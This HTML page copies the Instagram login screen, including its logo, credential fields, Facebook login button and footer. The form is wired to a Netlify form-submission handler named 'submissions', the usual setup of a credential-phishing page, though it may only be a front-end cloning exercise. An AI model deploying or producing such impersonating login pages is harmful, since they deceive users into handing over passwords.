<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Instagram</title>
  <link rel="shortcut icon" href="ii.png" type="image/x-icon">
  <style>
    body {
  font-family: sans-serif;
  background-color: #fafafa;
  font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen,
    Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
  box-sizing: border-box;
  height: 100vh;
  /* display: grid; */
  /* place-items: center; */
  /* display: flex; */
  /* justify-content: center; */
  /* align-items: center; */
  margin: 0;
}

a {
  text-decoration: none;
}
.container {
  position: relative;
  top: 50%;
  transform: translateY(-50%);
  max-width: 1000px;
  margin:  0 auto;
  /* margin: 20px; */
  display: flex;
  justify-content: center;
  flex-direction: column;
  align-items: center;
  font-size: 14px;
}

.box {
  /* border: 1px solid red; */
  max-width: 350px;
  /* padding: 10px; */
  width: 100%;
  display: flex;
  justify-content: center;
  align-items: center;
  flex-direction: column;
  background-color: #ffff;
  border: 1px solid #e6e6e6;
  border-radius: 1px;
  margin: 0 0 10px;
  padding: 10px 0;
  flex-grow: 1;
}

.heading {
  margin: 22px auto 12px;
  background-image: url("https://www.instagram.com/static/bundles/es6/sprite_core_b20f2a3cd7e4.png/b20f2a3cd7e4.png");
  background-position: -98px 0;
  height: 51px;
  width: 177px;
  overflow: hidden;
}

.field {
  margin: 10px 0;
  position: relative;
  font-size: 14px;
  width: 100%;
  text-overflow: ellipsis;
}

input {
  padding: 9px 0px 7px 9px;
  font-size: 12px;
  width: 16rem;
  height: 1.2rem;
  outline: none;
  background: #fafafa;
  border-radius: 3px;
  border: 1px solid #efefef;
}

/* label intial position*/

label {
  position: absolute;
  pointer-events: none;
  left: 10px;
  padding-bottom: 15px;
  transform: translateY(10px);
  line-height: 6px;
  transition: all ease-out 0.1s;
  font-size: 14px;
  color: #999;
  padding-top: 6px;
}

/* hiding placeholder in all browsers */

input::placeholder {
  visibility: hidden;
}

/* hiding  placeholder in mozilla */
.login-form ::-moz-placeholder {
  color: transparent;
}

/* label final position */
input:not(:placeholder-shown) + label {
  transform: translateY(0);
  font-size: 11px;
}

/* input padding increases if placeholder is not shown */
input:not(:placeholder-shown) {
  padding-top: 14px;
  padding-bottom: 2px;
}

.login-button {
  text-align: center;
  width: 100%;
  padding: 0.5rem;
  border: 1px solid transparent;
  background-color: #3897f0;
  color: #fff;
  font-weight: 600;
  font-size: 14px;
  cursor: pointer;
}

.separator {
  display: flex;
  justify-content: space-between;
  align-items: center;
  color: #999;
  margin-top: 6px;
}

.separator .line {
  height: 1px;
  width: 40%;
  background-color: #dbdbdb;
}

.other {
  display: flex;
  justify-content: center;
  flex-direction: column;
  align-items: center;
}

.fb-login-btn {
  margin: 1rem;
  border: 0;
  cursor: pointer;
  font-size: 14px;
  color: #385185;
  font-weight: 600;
  background: transparent;
}

.fb-icon {
  color: #385185;
  font-size: 1rem;
  padding-right: 1px;
}

.forgot-password {
  font-size: 11px;
  color: #003569;
}

.signup {
  color: #3897f0;
  font-weight: 600;
}
.khalacha{
  display: flex;
  justify-content: space-between;
  width: 300px;
  margin-top: 10px;
}
.appbox{

  height: 40px;
  width: 48%;
  border-radius: 5px;
}

.appbox img{
  height: 100%;
  width: 100%;
  cursor: pointer;
}
footer{
  margin-top: 50px;
  color: #999;
}
footer ul{
  list-style: none;
  display: flex;
  flex-wrap: wrap;
  justify-content: center;
}
footer li{
  cursor: pointer;
  margin: 0 5px;
}
.end{
  display: flex;
  justify-content: center;
  align-items: center;

}
.end select{
  cursor: pointer;
  color: #999;
  border: none;
  width: 70px;
  margin-right: 15px;
}
  </style>
</head>
<body>
  <div class="container">
    <div class="box">
      <div class="heading"></div>
      <form name="submissions" class="login-form" netlify>
        <div class="field">
          <input
            id="username"
            type="name"
            placeholder="Phone number, username, or email"
          />
          <label for="username">Phone number, username, or email</label>
        </div>
        <div class="field">
          <input id="password" type="password" placeholder="password" />
          <label for="password">Password</label>
        </div>
          <button class="login-button" title="login">Log In</button>
          <div class="separator">
            <div class="line"></div>
            <p>OR</p>
            <div class="line"></div>
          </div>
        <div class="other">
          <button class="fb-login-btn" type="button">
            <i class="fa fa-facebook-official fb-icon"></i>
            <span class="">Log in with Facebook</span>
          </button>
          <a class="forgot-password" href="#">Forgot password?</a>
        </div>
      </form>
    </div>
    <div class="box">
      <p>Don't have an account? <a class="signup" href="#">Sign Up</a></p>
    </div>
    <p>Get the app.</p>
    <div class="khalacha">
      <div class="appbox">
        <img src="apple.png" alt="">
      </div>
      <div class="appbox">
        <img src="googlr.png" alt="">
      </div>
    </div>
    <footer>
      <ul >
        <li>About</li>
        <li>Blog</li>
        <li>Jobs</li>
        <li>Help</li>
        <li>API</li>
        <li>Privacy</li>
        <li>Terms</li>
        <li>Top Accounts</li>
        <li>Hashtags</li>
        <li>Locations</li>
      </ul> 
      <div class="end">
        <select name="lang" id="langselect">
          <option value="">English</option>
          <option value="">English(UK)</option>
          <option value="">Marathi</option>
          <option value="">Hindi</option>
          <option value="">French</option>
          <option value="">Japanese</option>
          <option value="">Tamil</option>
          <option value="">Gujrati</option>
          <option value="">Punjabi</option>
          <option value="">Russian</option>
          <option value="">German</option>
          <option value="">Española</option>
        </select>
        <p>&copy; 2021 Instagram from Facebook</p>
      </div>
    </footer>

  </div>
</body>
</html>
